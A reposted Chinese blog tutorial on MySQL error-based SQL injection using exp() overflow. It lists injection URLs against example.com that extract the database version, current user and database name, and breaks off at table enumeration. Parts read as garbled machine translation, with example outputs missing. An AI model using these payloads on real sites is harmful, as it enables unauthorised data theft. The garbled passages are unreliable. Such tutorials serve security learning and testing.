【漏洞挖掘】——109、EXP报错注入深入刨析(exp-00019怎么解决)

【漏洞挖掘】——109、EXP报错注入深入刨析EXP函数简介
函数用法: exp(x) 函数功能:返回e的x次方
用法示例: EXP报错注入原理
EXP报错注入是一种通过利用溢出错误来注出数据的SQL注入方式,当传递一个大于709的值

EXP函数简介

功能使用:

指数(x)

函数功能: 返回e 的x 次方。

使用示例:

EXP报错注入原理

EXP错误插入是一种利用溢出错误插入数据的SQL注入方法;如果将大于709的值传递给exp()函数,则函数内会发生溢出错误。例如:

EXP报错注入流程

EXP错误注入的目标数据库版本必须是5.5以上~

获取数据库版本信息

http://www.example.com/?id=1\’ 和exp(~(select * from (select version() ) a) ) –+

获取用户名相关信息

http://www.example.com/?id=1\’ 和exp(~(select * from (select user() ) a) ) –+

获取数据库名的信息

http://www.example.com/?id=1\’ 和exp(~(select * from (select database() ) a) ) –+

获取数据库的表信息

查询第一张表名信息

#【漏洞挖掘】——109及以上EXP错误注入详细分析相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91286.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注